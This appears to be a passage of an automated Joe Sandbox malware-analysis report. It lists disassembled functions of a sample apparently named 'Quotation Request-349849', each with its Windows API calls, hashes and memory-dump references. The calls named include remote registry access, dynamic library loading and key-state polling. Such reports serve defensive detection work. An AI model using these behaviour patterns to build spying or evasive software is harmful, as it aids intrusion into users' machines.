                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 9d794cb85d7ae682d8dee3a5f2f85b984e7805dcfc809fded80ec3dc479a8aab
                                                      • Instruction ID: 6aba2d91945f68db68f1aa171c515f3bf1448717b10779ad3f424af2547268f9
                                                      • Opcode Fuzzy Hash: 9d794cb85d7ae682d8dee3a5f2f85b984e7805dcfc809fded80ec3dc479a8aab
                                                      • Instruction Fuzzy Hash: CB219574600309BBDB209F2DDC04A9977F4FF85721F208629FDA0D72D0EB7199658B90
                                                      Function 00836E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00836E89
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00836EBB
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00836ECC
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00836F06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 2bd2789e3f2993bb72f056b3ba88bc5580563ef432e2aabbb286311bd6a24e86
                                                      • Instruction ID: ce60d5122b2c90353396838a54e1ad9c89b350c1777e8373710702118ba7ad42
                                                      • Opcode Fuzzy Hash: 2bd2789e3f2993bb72f056b3ba88bc5580563ef432e2aabbb286311bd6a24e86
                                                      • Instruction Fuzzy Hash: 0E21B275500305EBDB209FADCC04A9A77E8FF84720F308A19F9A0D72D0EB74986587A1
                                                      Function 0083AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083AC54
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0083ACA8
                                                      • __swprintf.LIBCMT ref: 0083ACC1
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0085F910), ref: 0083ACFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: ad3ce45f34d115f47660891a0ea7b347908658028bbfe17db1583560794c789c
                                                      • Instruction ID: b6ec93308943756e58ee3114c21899e95954a93810a5d33e2072e99cf9641d83
                                                      • Opcode Fuzzy Hash: ad3ce45f34d115f47660891a0ea7b347908658028bbfe17db1583560794c789c
                                                      • Instruction Fuzzy Hash: AB216031A00209EFCB10DF68CD45DAE7BB8FF89715B004069F909EB352DA35EA41CB61
                                                      Function 00831AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00831B19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: e61d8e5009581c20661225852dabf3d04c953daca8ab2d732a5db1edf8bd7452
                                                      • Instruction ID: 3275a4d05c649a1b56e91519bb7acd3c62c7c6cc1065a892db7b17d5fa6d3d5a
                                                      • Opcode Fuzzy Hash: e61d8e5009581c20661225852dabf3d04c953daca8ab2d732a5db1edf8bd7452
                                                      • Instruction Fuzzy Hash: 75113970900209CBCF00EFA4D9698BEF7B4FF66704F5084A9D914A7792EB36590ACB90
                                                      Function 0084EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0084EC07
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0084EC37
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0084ED6A
                                                      • CloseHandle.KERNEL32(?), ref: 0084EDEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: 62d48dbcd51016e223596b0df46912e0364770d70a44e9fabb0502d08c72bca4
                                                      • Instruction ID: ec78b1384d361a10aed4f360c2d027e7da48614247402f95be55fea662e01781
                                                      • Opcode Fuzzy Hash: 62d48dbcd51016e223596b0df46912e0364770d70a44e9fabb0502d08c72bca4
                                                      • Instruction Fuzzy Hash: 99812E716047109FD760EF28C886B2AB7E5FF48720F14881EFA99DB3D2D674AC408B52
                                                      Function 007F541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                      • Instruction ID: 341f0f7de184cab9a829c34f00882396dc76444b4d171943c14d11cb787bea47
                                                      • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                      • Instruction Fuzzy Hash: 2551B170A00B0DDBDB248FA9D88467E77A3AF40321F248729FB25973D1D7789DA18B41
                                                      Function 00850037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 00850E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008500FD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085013C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00850183
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 008501AF
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 008501BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: 9a06f02dc214223abb9fead4fefbaf10c3e3e57ae94ba6a6f10718e9b734aaab
                                                      • Instruction ID: 08d607036445dd2d962abc40a9ee665372cd1d137e5afce8fb70182f0a734078
                                                      • Opcode Fuzzy Hash: 9a06f02dc214223abb9fead4fefbaf10c3e3e57ae94ba6a6f10718e9b734aaab
                                                      • Instruction Fuzzy Hash: 5E514A71208604AFC704EF58C885E6AB7F9FF84315F44891EF995C7292EB35E908CB52
                                                      Function 0084D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084D927
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0084D9AA
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0084D9C6
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0084DA07
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084DA21
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837896,?,?,00000000), ref: 007D5A2C
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837896,?,?,00000000,?,?), ref: 007D5A50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      • Opcode ID: 36a1246832ff5f0ce1715d8f7363b415d629c1dd6fdd830fe834551ee63d17bf
                                                      • Instruction ID: 4729cdb88d857fdb3c9207c063927593a0d52fd146cfa7b9a8e118d5ab9c6fa0
                                                      • Opcode Fuzzy Hash: 36a1246832ff5f0ce1715d8f7363b415d629c1dd6fdd830fe834551ee63d17bf
                                                      • Instruction Fuzzy Hash: 23512675A00619DFCB00EFA8C4889ADBBF5FF09324B048066E959EB312D734AD45CF91
                                                      Function 0083E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0083E61F
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0083E648
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0083E687
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0083E6AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0083E6B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: 1f0d32825580b33f721d0ae98a311815f7393b12e858804dd9a76f5968153670
                                                      • Instruction ID: ca4db3df488827bb2201ff2a64ca1ce654460973f9076351f0735751d543bfde
                                                      • Opcode Fuzzy Hash: 1f0d32825580b33f721d0ae98a311815f7393b12e858804dd9a76f5968153670
                                                      • Instruction Fuzzy Hash: 39512A75A00205DFCB01EF64C9859AEBBF5FF49314F1480A9E909AB362DB35ED11DB50
                                                      Function 0085A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d29470f3bb162fb33de4a4c8eb90f0921ad9df48036b7f9d12e8643aa21c4ef5
                                                      • Instruction ID: f498424dd7791148b4642dd711e837ade8f9385f294330700bf6a0b0914b064f
                                                      • Opcode Fuzzy Hash: d29470f3bb162fb33de4a4c8eb90f0921ad9df48036b7f9d12e8643aa21c4ef5
                                                      • Instruction Fuzzy Hash: 1741B335944A08AFD718DB28CCC8FA9BBA4FB09352F140265FD16E72E1DB309D49DA51
                                                      Function 007D2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 007D2357
                                                      • ScreenToClient.USER32(008957B0,?), ref: 007D2374
                                                      • GetAsyncKeyState.USER32(00000001), ref: 007D2399
                                                      • GetAsyncKeyState.USER32(00000002), ref: 007D23A7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 06ac84e9c00a54b7981082a3bf772ed39484e9db0bf00307f969133f9a4c3db6
                                                      • Instruction ID: b9659cd4aa2ae6962f0f001e71a735b31d7cf571d4861dfd9e5bedca03416371
                                                      • Opcode Fuzzy Hash: 06ac84e9c00a54b7981082a3bf772ed39484e9db0bf00307f969133f9a4c3db6
                                                      • Instruction Fuzzy Hash: A241AF75604209FBCF159F68CC44AE9BB74FB15320F20431AF828D32E1CB389955DB91
                                                      Function 008263AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008263E7
                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00826433
                                                      • TranslateMessage.USER32(?), ref: 0082645C
                                                      • DispatchMessageW.USER32(?), ref: 00826466
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00826475
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                      • String ID:
                                                      • API String ID: 2108273632-0
                                                      • Opcode ID: 5f4d55585feb20fca7999236dcdc3f78a4e8cbde26c21a824cb26837ad40c90b
                                                      • Instruction ID: fd5686da67ce613f3a5c1b660c20224b523f78f82c64ebb791f689f886da3cd0
                                                      • Opcode Fuzzy Hash: 5f4d55585feb20fca7999236dcdc3f78a4e8cbde26c21a824cb26837ad40c90b
                                                      • Instruction Fuzzy Hash: 9F31E531900666EFDB25EFB0EC48BB67BE8FB01304F180166E561C31A1F72594E9DBA0
                                                      Function 00828A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00828A30
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00828ADA
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00828AE2
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00828AF0
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00828AF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
                                                      • Instruction ID: 9ff1818779c28f7b41d0b4fcc1d181be51e639c224efb4bbb040a51db3fe6dcb
                                                      • Opcode Fuzzy Hash: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
                                                      • Instruction Fuzzy Hash: D931E071501229EFDF14CFA8E94CA9E3BB5FB04316F10822AF925E71D1CBB49954CB91
                                                      Function 0082B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 0082B204
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0082B221
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0082B259
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0082B27F
                                                      • _wcsstr.LIBCMT ref: 0082B289
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID:
                                                      • API String ID: 3902887630-0
                                                      • Opcode ID: a095d4e3aab2dc4607a7100314d16c702bb29e6ff8965ad3c0882f5da0aa916f
                                                      • Instruction ID: 365107395fdab250249ed36e54d1a94e3ceed11b34236f75cb32f188c1585b2b
                                                      • Opcode Fuzzy Hash: a095d4e3aab2dc4607a7100314d16c702bb29e6ff8965ad3c0882f5da0aa916f
                                                      • Instruction Fuzzy Hash: C5210772605314FBEB159B79AC09E7F7B9CEF49710F104139F904DA2A2EF65DC8092A0
                                                      Function 0085B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085B192
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0085B1B7
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0085B1CF
                                                      • GetSystemMetrics.USER32(00000004), ref: 0085B1F8
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00840E90,00000000), ref: 0085B216
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: 7d67f23cfd4203c8cef89165abacad7ba29e9eb2463375e90b38143980577f37
                                                      • Instruction ID: 4cd90cf5e27491c88eb390980bc3944f50dbd2c14862482cbee7827fb09f7a5b
                                                      • Opcode Fuzzy Hash: 7d67f23cfd4203c8cef89165abacad7ba29e9eb2463375e90b38143980577f37
                                                      • Instruction Fuzzy Hash: 3821A171A60655AFCB109F78DC18A6A3BA4FB25362F144739FD32D71E0E7309814CB90
                                                      Function 00829307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00829320
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829352
                                                      • __itow.LIBCMT ref: 0082936A
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829392
                                                      • __itow.LIBCMT ref: 008293A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
